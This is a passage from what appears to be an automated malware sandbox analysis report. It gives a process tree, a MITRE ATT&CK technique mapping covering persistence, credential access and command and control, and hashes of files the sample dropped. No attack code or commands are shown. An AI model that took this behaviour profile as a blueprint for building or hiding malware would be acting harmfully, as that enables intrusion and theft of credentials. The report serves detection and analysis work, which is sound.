                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                            1⤵
                                                                              PID:4536
                                                                            • C:\Windows\explorer.exe
                                                                              C:\Windows\explorer.exe
                                                                              1⤵
                                                                              • Suspicious behavior: MapViewOfSection
                                                                              PID:1236
                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                              1⤵
                                                                                PID:844
                                                                              • C:\Windows\explorer.exe
                                                                                C:\Windows\explorer.exe
                                                                                1⤵
                                                                                • Suspicious behavior: MapViewOfSection
                                                                                PID:2728
                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                1⤵
                                                                                  PID:4780
                                                                                • C:\Windows\explorer.exe
                                                                                  C:\Windows\explorer.exe
                                                                                  1⤵
                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                  PID:5028
                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                  1⤵
                                                                                    PID:3620
                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                    c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                    1⤵
                                                                                      PID:1708
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                      1⤵
                                                                                        PID:5116
                                                                                      • C:\Users\Admin\AppData\Local\Temp\F5F9.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\F5F9.exe
                                                                                        1⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:4692
                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                        1⤵
                                                                                        • Drops file in Windows directory
                                                                                        • Modifies registry class
                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                        PID:4128
                                                                                      • C:\Windows\system32\browser_broker.exe
                                                                                        C:\Windows\system32\browser_broker.exe -Embedding
                                                                                        1⤵
                                                                                        • Modifies Internet Explorer settings
                                                                                        PID:4608
                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                        1⤵
                                                                                        • Modifies registry class
                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                        PID:976
                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                        1⤵
                                                                                        • Modifies registry class
                                                                                        PID:4616
                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                        1⤵
                                                                                        • Modifies registry class
                                                                                        PID:2200
                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                        1⤵
                                                                                          PID:3744
                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                          1⤵
                                                                                          • Modifies registry class
                                                                                          PID:1040

                                                                                        Network

                                                                                        MITRE ATT&CK Matrix ATT&CK v6

                                                                                        Persistence

                                                                                        Registry Run Keys / Startup Folder

                                                                                        1
                                                                                        T1060

                                                                                        BITS Jobs

                                                                                        1
                                                                                        T1197

                                                                                        Defense Evasion

                                                                                        Modify Registry

                                                                                        3
                                                                                        T1112

                                                                                        BITS Jobs

                                                                                        1
                                                                                        T1197

                                                                                        Install Root Certificate

                                                                                        1
                                                                                        T1130

                                                                                        Credential Access

                                                                                        Credentials in Files

                                                                                        3
                                                                                        T1081

                                                                                        Discovery

                                                                                        Software Discovery

                                                                                        1
                                                                                        T1518

                                                                                        Query Registry

                                                                                        4
                                                                                        T1012

                                                                                        System Information Discovery

                                                                                        5
                                                                                        T1082

                                                                                        Security Software Discovery

                                                                                        1
                                                                                        T1063

                                                                                        Peripheral Device Discovery

                                                                                        1
                                                                                        T1120

                                                                                        Remote System Discovery

                                                                                        1
                                                                                        T1018

                                                                                        Collection

                                                                                        Data from Local System

                                                                                        3
                                                                                        T1005

                                                                                        Command and Control

                                                                                        Web Service

                                                                                        1
                                                                                        T1102

                                                                                        Replay Monitor

                                                                                        Loading Replay Monitor...

                                                                                        Downloads

                                                                                        • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                          MD5

                                                                                          7124be0b78b9f4976a9f78aaeaed893a

                                                                                          SHA1

                                                                                          804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                          SHA256

                                                                                          bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                          SHA512

                                                                                          49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                        • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                          MD5

                                                                                          7124be0b78b9f4976a9f78aaeaed893a

                                                                                          SHA1

                                                                                          804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                          SHA256

                                                                                          bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                          SHA512

                                                                                          49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                        • C:\Program Files\Reference Assemblies\WJLMHFNHHP\ultramediaburner.exe
                                                                                          MD5

                                                                                          6103ca066cd5345ec41feaf1a0fdadaf

                                                                                          SHA1

                                                                                          938acc555933ee4887629048be4b11df76bb8de8

                                                                                          SHA256

                                                                                          b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                          SHA512

                                                                                          a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                        • C:\Program Files\Reference Assemblies\WJLMHFNHHP\ultramediaburner.exe
                                                                                          MD5

                                                                                          6103ca066cd5345ec41feaf1a0fdadaf

                                                                                          SHA1

                                                                                          938acc555933ee4887629048be4b11df76bb8de8

                                                                                          SHA256

                                                                                          b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                          SHA512

                                                                                          a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                        • C:\Program Files\install.dat
                                                                                          MD5

                                                                                          31e4a5735b20be6a53cbb552663b1cc3

                                                                                          SHA1

                                                                                          c080a61b65a34928a1fb1899db8a3698a4892a4c

                                                                                          SHA256

                                                                                          b28936c7d89e33fdc4eace2d0e92ed7d3b02bbfc5e7c8297d16f721d0254305f

                                                                                          SHA512

                                                                                          3e98a84f11ca1eb27e894ce6ac7c6ff6c37382459a467ef30a87bfe36149960c5c76f2beeb9415ab3287f002012e65c4f754dcd17045986306c6afab399a0604

                                                                                        • C:\Program Files\install.dll
                                                                                          MD5

                                                                                          fe60ddbeab6e50c4f490ddf56b52057c

                                                                                          SHA1

                                                                                          6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                          SHA256

                                                                                          9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                          SHA512

                                                                                          0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                                                                                          MD5

                                                                                          a4022a7d2b113226b000be0705680813

                                                                                          SHA1

                                                                                          599e22d03201704127a045ca53ffb78f9ea3b6c3

                                                                                          SHA256

                                                                                          2557a14e476d55330043af2858dbf1377e24dba3fa9aedc369d5feefefb7f9a7

                                                                                          SHA512

                                                                                          40ef88632a4ad38a7d21c640a7f0c8cd7c76b8451f55dd758c15baa5a90f4f0938de409426570c4405362fd2d90fadd96d23d190e09692b5fbe2c87ebc8d3c60

                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                          MD5

                                                                                          b562d9ee871d1943d82e341ef7e445b8

                                                                                          SHA1

                                                                                          4f9a1a8f65e6ad0d043d01143969a951d9fedd95

                                                                                          SHA256

                                                                                          b1a3445ca40e51009fb587e9de776e9588cd6ada274d51800d056b1006bf2fe2

                                                                                          SHA512

                                                                                          0c2eaf0bb00a0fb594670547052ad5b1c6e650f271fca2608a1a40cc918e16dd183f289127ff56f87dbb4c9b83f7184e523f3f7f806578df6d908029f1f13abe

                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                          MD5

                                                                                          2c369105a2a7dc71c4ab26c0ed10eafe

                                                                                          SHA1

                                                                                          bdb8d9a1f1a7025394b2497111814c4d4e389996

                                                                                          SHA256

                                                                                          ca273d84ed5565f7df201370ccb77e2d7b79289c26b200d879ba925ada98c249

                                                                                          SHA512

                                                                                          04777eb4bf470ed392b3c42793539276525edbb37cb2ef9e7269e977211ea71539c78d58174e1df10301977ebd4b495994c3d8b858d327e6851d8566061aae0b

                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                          MD5

                                                                                          8a2241557e086977b9081e6db808da7e

                                                                                          SHA1

                                                                                          ad31e3b53567a3f637d6ccc7057b19f83e536811

                                                                                          SHA256

                                                                                          a471bc5ccbd339fbc7580b6963a5cda828e5e8d59d66f3ec0911375628df7add

                                                                                          SHA512

                                                                                          078ce3e6de7a0199f228c93c74e4f47cb66de55d7f146fbd6dfee44086a14952f1ab79af1e92aa76797bd57e5196a5ced4ec878b06e17982ae951299faf989e3

                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                          MD5

                                                                                          e8c888960e9371586d6dec64b646ef26

                                                                                          SHA1

                                                                                          eebc6ac739ba33778754c886d8bb40a06e8fccd7

                                                                                          SHA256

                                                                                          341b2bf43a4c29c5b36a41b531ae70f872218e8d6b576edea146442f375b7649

                                                                                          SHA512

                                                                                          1c3fd7f7665d28341cbd7abbf56e89a5e35c1508934ff21a165f13faf9a3fb9a50de03cbd61d2cc73ddcdb5fbca7be1878b4a57cd986f093bf4dc88fe33c3078

                                                                                        • C:\Users\Admin\AppData\Local\Temp\104lqbss.vme\GcleanerWW.exe
                                                                                          MD5

                                                                                          4f4adcbf8c6f66dcfc8a3282ac2bf10a

                                                                                          SHA1

                                                                                          c35a9fc52bb556c79f8fa540df587a2bf465b940

                                                                                          SHA256

                                                                                          6b3c238ebcf1f3c07cf0e556faa82c6b8fe96840ff4b6b7e9962a2d855843a0b

                                                                                          SHA512

                                                                                          0d15d65c1a988dfc8cc58f515a9bb56cbaf1ff5cb0a5554700bc9af20a26c0470a83c8eb46e16175154a6bcaad7e280bbfd837a768f9f094da770b7bd3849f88

                                                                                        • C:\Users\Admin\AppData\Local\Temp\2aggthv4.lfo\google-game.exe
                                                                                          MD5

                                                                                          e27c391b1f65a77478fcab4d5e102cef

                                                                                          SHA1

                                                                                          44fa8a89ce66580e1561e0e6c72f9c440251522c

                                                                                          SHA256

                                                                                          2f4c3dd5cdc9982231f31e9fed7be3d8be472252fb1760c17e28c2c13514aed6

                                                                                          SHA512

                                                                                          0ffad244820443af18cc184131ab33437da6b957e9f41ddbf945a2e3d86d529c0b2fccdab069ff033c6d9d0bacab3843d55cd93b2353f9dfda892be48df608ff

                                                                                        • C:\Users\Admin\AppData\Local\Temp\2aggthv4.lfo\google-game.exe
                                                                                          MD5

                                                                                          e27c391b1f65a77478fcab4d5e102cef

                                                                                          SHA1

                                                                                          44fa8a89ce66580e1561e0e6c72f9c440251522c

                                                                                          SHA256

                                                                                          2f4c3dd5cdc9982231f31e9fed7be3d8be472252fb1760c17e28c2c13514aed6

                                                                                          SHA512

                                                                                          0ffad244820443af18cc184131ab33437da6b957e9f41ddbf945a2e3d86d529c0b2fccdab069ff033c6d9d0bacab3843d55cd93b2353f9dfda892be48df608ff

                                                                                        • C:\Users\Admin\AppData\Local\Temp\4a-ab00c-5b5-8cf86-c02c0dd82436f\Geqaevoqomu.exe
                                                                                          MD5

                                                                                          2e91d25073151415f8c39de2262cbba8

                                                                                          SHA1

                                                                                          32544481a34273a1a870822152d201ea9c19b34d

                                                                                          SHA256

                                                                                          0325c7bc34a7f7e418e3f7b081564d16aed6b3c2cf87bfdc914c3b5e4bed53e0

                                                                                          SHA512

                                                                                          306e7314d1944a273af9d8996eae7a0e7bb67e87325da42686fc85c55a8ddd055300425acae30d6f44c1257378eed3ca7876d6f5eec4efd47182ede973001e71

                                                                                        • C:\Users\Admin\AppData\Local\Temp\4a-ab00c-5b5-8cf86-c02c0dd82436f\Geqaevoqomu.exe
                                                                                          MD5

                                                                                          2e91d25073151415f8c39de2262cbba8

                                                                                          SHA1

                                                                                          32544481a34273a1a870822152d201ea9c19b34d

                                                                                          SHA256

                                                                                          0325c7bc34a7f7e418e3f7b081564d16aed6b3c2cf87bfdc914c3b5e4bed53e0

                                                                                          SHA512

                                                                                          306e7314d1944a273af9d8996eae7a0e7bb67e87325da42686fc85c55a8ddd055300425acae30d6f44c1257378eed3ca7876d6f5eec4efd47182ede973001e71

                                                                                        • C:\Users\Admin\AppData\Local\Temp\4a-ab00c-5b5-8cf86-c02c0dd82436f\Geqaevoqomu.exe.config
                                                                                          MD5

                                                                                          98d2687aec923f98c37f7cda8de0eb19

                                                                                          SHA1

                                                                                          f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                          SHA256

                                                                                          8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                          SHA512

                                                                                          95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                        • C:\Users\Admin\AppData\Local\Temp\4a-ab00c-5b5-8cf86-c02c0dd82436f\Kenessey.txt
                                                                                          MD5

                                                                                          97384261b8bbf966df16e5ad509922db

                                                                                          SHA1

                                                                                          2fc42d37fee2c81d767e09fb298b70c748940f86

                                                                                          SHA256

                                                                                          9c0d294c05fc1d88d698034609bb81c0c69196327594e4c69d2915c80fd9850c

                                                                                          SHA512

                                                                                          b77fe2d86fbc5bd116d6a073eb447e76a74add3fa0d0b801f97535963241be3cdce1dbcaed603b78f020d0845b2d4bfc892ceb2a7d1c8f1d98abc4812ef5af21

                                                                                        • C:\Users\Admin\AppData\Local\Temp\a2-20ace-495-e87ae-5cd457fd1efa8\Lajuwipahae.exe
                                                                                          MD5

                                                                                          18e49540637bccc9b3a7ca3d48cae223

                                                                                          SHA1

                                                                                          b5b5b9c981420929faa959c0ddf6831dfde6e9a6

                                                                                          SHA256

                                                                                          698471c960eaa5c2a1b439ac307ff96a5735680e3220d1d5e1fc75aa33c8a55b

                                                                                          SHA512

                                                                                          a33cc44d211c29442ed5ce61ff70b5469468853099f16209f3895d5b688349a72069044bee07d9d9dbe8339ff60d13d7b7df103ce1113ed1a34a78f04e68415e

                                                                                        • C:\Users\Admin\AppData\Local\Temp\a2-20ace-495-e87ae-5cd457fd1efa8\Lajuwipahae.exe
                                                                                          MD5

                                                                                          18e49540637bccc9b3a7ca3d48cae223

                                                                                          SHA1

                                                                                          b5b5b9c981420929faa959c0ddf6831dfde6e9a6

                                                                                          SHA256

                                                                                          698471c960eaa5c2a1b439ac307ff96a5735680e3220d1d5e1fc75aa33c8a55b

                                                                                          SHA512

                                                                                          a33cc44d211c29442ed5ce61ff70b5469468853099f16209f3895d5b688349a72069044bee07d9d9dbe8339ff60d13d7b7df103ce1113ed1a34a78f04e68415e

                                                                                        • C:\Users\Admin\AppData\Local\Temp\a2-20ace-495-e87ae-5cd457fd1efa8\Lajuwipahae.exe.config
                                                                                          MD5

                                                                                          98d2687aec923f98c37f7cda8de0eb19

                                                                                          SHA1

                                                                                          f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                          SHA256

                                                                                          8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                          SHA512

                                                                                          95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                        • C:\Users\Admin\AppData\Local\Temp\catsskju.fol\inst.exe
                                                                                          MD5

                                                                                          edd1b348e495cb2287e7a86c8070898d

                                                                                          SHA1

                                                                                          682bf3f9ff5aff794aabb7afe3e0c4eda528ce2a

                                                                                          SHA256

                                                                                          eeae077991dfe0fb739133c5ac0e10d02772f994173281dd41370c0aadf2fd81

                                                                                          SHA512

                                                                                          613e2c43ca9c4f7416f7450eaed58dcb58cd95cd82c55fc5212af788eed793f26beb4be38f850aa1009eddfd28372775236f36b36977e51512c41e1a9e619d72

                                                                                        • C:\Users\Admin\AppData\Local\Temp\catsskju.fol\inst.exe
                                                                                          MD5

                                                                                          edd1b348e495cb2287e7a86c8070898d

                                                                                          SHA1

                                                                                          682bf3f9ff5aff794aabb7afe3e0c4eda528ce2a

                                                                                          SHA256

                                                                                          eeae077991dfe0fb739133c5ac0e10d02772f994173281dd41370c0aadf2fd81

                                                                                          SHA512

                                                                                          613e2c43ca9c4f7416f7450eaed58dcb58cd95cd82c55fc5212af788eed793f26beb4be38f850aa1009eddfd28372775236f36b36977e51512c41e1a9e619d72

                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-3EHVU.tmp\ultramediaburner.tmp
                                                                                          MD5

                                                                                          4e8c7308803ce36c8c2c6759a504c908

                                                                                          SHA1

                                                                                          a3ec8c520620c0f9c8760f5c2c3ef6ab593240dc

                                                                                          SHA256

                                                                                          90fdd4ddf0f5700ed6e48ac33b5ede896a2d67e314fb48f6d948ab01b5c7ea4c

                                                                                          SHA512

                                                                                          780c1e8dce3e3f22dc820853bc18cadd969d7c1ce5a1bef52dbb09b3ae3c60b80116913c092760b9d50bda7857ff7de854e7b589106f3a2187697b76e3f1d7e7

                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-3EHVU.tmp\ultramediaburner.tmp
                                                                                          MD5

                                                                                          4e8c7308803ce36c8c2c6759a504c908

                                                                                          SHA1

                                                                                          a3ec8c520620c0f9c8760f5c2c3ef6ab593240dc

                                                                                          SHA256

                                                                                          90fdd4ddf0f5700ed6e48ac33b5ede896a2d67e314fb48f6d948ab01b5c7ea4c

                                                                                          SHA512

                                                                                          780c1e8dce3e3f22dc820853bc18cadd969d7c1ce5a1bef52dbb09b3ae3c60b80116913c092760b9d50bda7857ff7de854e7b589106f3a2187697b76e3f1d7e7

                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-B9UOQ.tmp\Ultra.exe
                                                                                          MD5

                                                                                          cc2e3f1906f2f7a7318ce8e6f0f00683

                                                                                          SHA1

                                                                                          ff26f4b8ba148ddd488dde4eadd2412d6c288580

                                                                                          SHA256

                                                                                          0ed89ff238edaa1b5b084d5c3c7ba6864b59dac5a6fd961a9065e966f55b9cb2

                                                                                          SHA512

                                                                                          49d86be8794e0161bc2f2db626b9ce0031e9614486605f283c6cd8429fe9d907f3f3851d15cd318df5945ad2acac85da18f042f3692c38b794cc11d27b77a05a

                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-B9UOQ.tmp\Ultra.exe
                                                                                          MD5

                                                                                          cc2e3f1906f2f7a7318ce8e6f0f00683

                                                                                          SHA1

                                                                                          ff26f4b8ba148ddd488dde4eadd2412d6c288580

                                                                                          SHA256

                                                                                          0ed89ff238edaa1b5b084d5c3c7ba6864b59dac5a6fd961a9065e966f55b9cb2

                                                                                          SHA512

                                                                                          49d86be8794e0161bc2f2db626b9ce0031e9614486605f283c6cd8429fe9d907f3f3851d15cd318df5945ad2acac85da18f042f3692c38b794cc11d27b77a05a

                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-F711K.tmp\Install.tmp
                                                                                          MD5

                                                                                          45ca138d0bb665df6e4bef2add68c7bf

                                                                                          SHA1

                                                                                          12c1a48e3a02f319a3d3ca647d04442d55e09265

                                                                                          SHA256

                                                                                          3960a0597104fc5bbf82bf6c03564a1eb6a829c560d1f50d0a63b4772fafbe37

                                                                                          SHA512

                                                                                          cd1a0493c26798eb70b3dabb8a439de7792c4676905cad21c6b3f372213ce9f6b65648245defcd36d4f19285160f41c62e1025e772e6b9f11aa126388ea8364f

                                                                                        • C:\Users\Admin\AppData\Local\Temp\kclywwvp.fzz\y1.exe
                                                                                          MD5

                                                                                          211704d0d7c978042c9fd858fd7a3256

                                                                                          SHA1

                                                                                          ed582bf85c777e03990562af0ca5d3503646e462

                                                                                          SHA256

                                                                                          98105987364d21e0167d6b6a90510a9beea0746eca7a3326c13c11806ffced79

                                                                                          SHA512

                                                                                          a25778cfe12b106e73b2a410276c0fe7b999501abfe2bb4c51d60992691f2d540797c05fcdcd653580f499e3042a32e73d4881a294ba599299b344f58e56ee11

                                                                                        • C:\Users\Admin\AppData\Local\Temp\kclywwvp.fzz\y1.exe
                                                                                          MD5

                                                                                          211704d0d7c978042c9fd858fd7a3256

                                                                                          SHA1

                                                                                          ed582bf85c777e03990562af0ca5d3503646e462

                                                                                          SHA256

                                                                                          98105987364d21e0167d6b6a90510a9beea0746eca7a3326c13c11806ffced79

                                                                                          SHA512

                                                                                          a25778cfe12b106e73b2a410276c0fe7b999501abfe2bb4c51d60992691f2d540797c05fcdcd653580f499e3042a32e73d4881a294ba599299b344f58e56ee11

                                                                                        • C:\Users\Admin\AppData\Local\Temp\nsxFFE3.tmp\tempfile.ps1
                                                                                          MD5

                                                                                          71e5795ca945d491ca5980bbba31c277

                                                                                          SHA1

                                                                                          c33cd8b3854637bb602f54dfc0fca24d71ca2f82

                                                                                          SHA256

                                                                                          fd691567c181efe49969737247ae8052278b294d54f5905478f9477d4c76ab2f

                                                                                          SHA512

                                                                                          f8404c4c609f82f91ad144bc0dd0c7d66e70393f6eab3af55d88969adc141e054c6de117396067ae2bc058e494453d346cd8ed595d7646dfddbb54f8d24f415a

                                                                                        • C:\Users\Admin\AppData\Local\Temp\nsxFFE3.tmp\tempfile.ps1
                                                                                          MD5

                                                                                          22d6ff2aa8423bbdccf162adcb9e6b2b

                                                                                          SHA1

                                                                                          528d8a516b181b03c425ab2a76ef3c3437885ae6

                                                                                          SHA256

                                                                                          f35aeb2952ffdef659754d039c46197a1a7515f4267148698cf10c8a577a8b2e

                                                                                          SHA512

                                                                                          1fe67ccb9bd3d488ec3a7a1ff676d29d904b5cd675f35c80f7a52b68f7d7f6e9ec20fcbbd04115a8ffa86c3121e10037126f0af28bdbf7b7f8fbcd972765e65b

                                                                                        • C:\Users\Admin\AppData\Local\Temp\nsxFFE3.tmp\tempfile.ps1
                                                                                          MD5

                                                                                          7e7a7312423953e5486a4012a77b7ae4

                                                                                          SHA1

                                                                                          ec8ddd4b577c2e5fa9e8bcc47a148c7f491bab53

                                                                                          SHA256

                                                                                          954a3e3ed9171d8fc1c2a52ca9811733edcacb25cb03545e28ebb0457f0e1c9d

                                                                                          SHA512

                                                                                          209582d33265cce3318ae6da5ed38ece94219551ac57166752cdce12c4c35ac834a607a879fa6d215c1440350455a27e27d5ee6bfc2ffd33081e3b3cdb324257

                                                                                        • C:\Users\Admin\AppData\Local\Temp\nsxFFE3.tmp\tempfile.ps1
                                                                                          MD5

                                                                                          8fdce8a3774e1f7ed61d8299adee3edd

                                                                                          SHA1

                                                                                          309d0f30bebac97e6fbc270f6186082f430d6231

                                                                                          SHA256

                                                                                          afdd9a253a5a96702951c7d00089ae04eb1eb9933699abf097a7d751e34fddee

                                                                                          SHA512

                                                                                          d66dcba0d16964abf7097b1ab25323025493f49b1da7031c359ab087ca9bca2a6b6f2901b9491c2d7a52f37958fc6f522e143ce950d024628156db002810af19

                                                                                        • C:\Users\Admin\AppData\Local\Temp\pun3q1hq.faz\instEU.exe
                                                                                          MD5

                                                                                          bdb62dc3502ea91f26181fa451bd0878

                                                                                          SHA1

                                                                                          bff5609cd44209ee1f07920b2103757792866d7a

                                                                                          SHA256

                                                                                          6b1dc06f68c7971c2dab6e0d01ed1691b3a400490cd2a1d6ce88c307d7566a3c

                                                                                          SHA512

                                                                                          12d94ef15f12268a2c849c18c06319b5796be4c11ffaa81c6a2e6356674842f075509acb08749219076a99e99179e2594541abe86e0c50e380b11fcc55375e5d

                                                                                        • C:\Users\Admin\AppData\Local\Temp\pun3q1hq.faz\instEU.exe
                                                                                          MD5

                                                                                          bdb62dc3502ea91f26181fa451bd0878

                                                                                          SHA1

                                                                                          bff5609cd44209ee1f07920b2103757792866d7a

                                                                                          SHA256

                                                                                          6b1dc06f68c7971c2dab6e0d01ed1691b3a400490cd2a1d6ce88c307d7566a3c

                                                                                          SHA512

                                                                                          12d94ef15f12268a2c849c18c06319b5796be4c11ffaa81c6a2e6356674842f075509acb08749219076a99e99179e2594541abe86e0c50e380b11fcc55375e5d

                                                                                        • C:\Users\Admin\AppData\Local\Temp\r5oow2s0.5uh\app.exe
                                                                                          MD5

                                                                                          fc5bac07860dd958dc5aa89ab070e258

                                                                                          SHA1

                                                                                          dc78208192e3a5823b2d24b3522be69e8111a48b

                                                                                          SHA256

                                                                                          34220630307bb6b02f86b54582a5d901c6dbed1e1104a85080903c84cdbd975e

                                                                                          SHA512

                                                                                          016a170333bb198e59244f65c988bbc61621650adad19b43845489194074c762c9cd96798ed9c9e3bd4f263e9b881153680d2d0786e722ea574960fea7063aba

                                                                                        • C:\Users\Admin\AppData\Local\Temp\r5oow2s0.5uh\app.exe
                                                                                          MD5

                                                                                          fc5bac07860dd958dc5aa89ab070e258

                                                                                          SHA1

                                                                                          dc78208192e3a5823b2d24b3522be69e8111a48b

                                                                                          SHA256

                                                                                          34220630307bb6b02f86b54582a5d901c6dbed1e1104a85080903c84cdbd975e

                                                                                          SHA512

                                                                                          016a170333bb198e59244f65c988bbc61621650adad19b43845489194074c762c9cd96798ed9c9e3bd4f263e9b881153680d2d0786e722ea574960fea7063aba

                                                                                        • C:\Users\Admin\AppData\Local\Temp\r5oow2s0.5uh\app.exe
                                                                                          MD5

                                                                                          fc5bac07860dd958dc5aa89ab070e258

                                                                                          SHA1

                                                                                          dc78208192e3a5823b2d24b3522be69e8111a48b

                                                                                          SHA256

                                                                                          34220630307bb6b02f86b54582a5d901c6dbed1e1104a85080903c84cdbd975e

                                                                                          SHA512

                                                                                          016a170333bb198e59244f65c988bbc61621650adad19b43845489194074c762c9cd96798ed9c9e3bd4f263e9b881153680d2d0786e722ea574960fea7063aba

                                                                                        • C:\Users\Admin\AppData\Local\Temp\rgaeei42.opg\c7ae36fa.exe
                                                                                          MD5

                                                                                          454bf09ef9f42570b1771061c6bdfb4d

                                                                                          SHA1

                                                                                          c3866b9c3091539d32f83a934719ca0018124624

                                                                                          SHA256

                                                                                          e5439c7d8a3a2dc58a63fe2d9167e9625c99d88c6023e27c7f45e3df06ac3a45

                                                                                          SHA512

                                                                                          1c543d1d5a3025e2b492afdc84c2c8f08b6d04705fafbdb79900dbe7125fbf7b27e8c05a4e8e5ff5333026bca07cb6d5d31955b83b7a4f7ba4b5f24395a84da0

                                                                                        • C:\Users\Admin\AppData\Local\Temp\rgaeei42.opg\c7ae36fa.exe
                                                                                          MD5

                                                                                          454bf09ef9f42570b1771061c6bdfb4d

                                                                                          SHA1

                                                                                          c3866b9c3091539d32f83a934719ca0018124624

                                                                                          SHA256

                                                                                          e5439c7d8a3a2dc58a63fe2d9167e9625c99d88c6023e27c7f45e3df06ac3a45

                                                                                          SHA512

                                                                                          1c543d1d5a3025e2b492afdc84c2c8f08b6d04705fafbdb79900dbe7125fbf7b27e8c05a4e8e5ff5333026bca07cb6d5d31955b83b7a4f7ba4b5f24395a84da0

                                                                                        • C:\Users\Admin\AppData\Local\Temp\t2xdd3ld.spx\SunLabsPlayer.exe
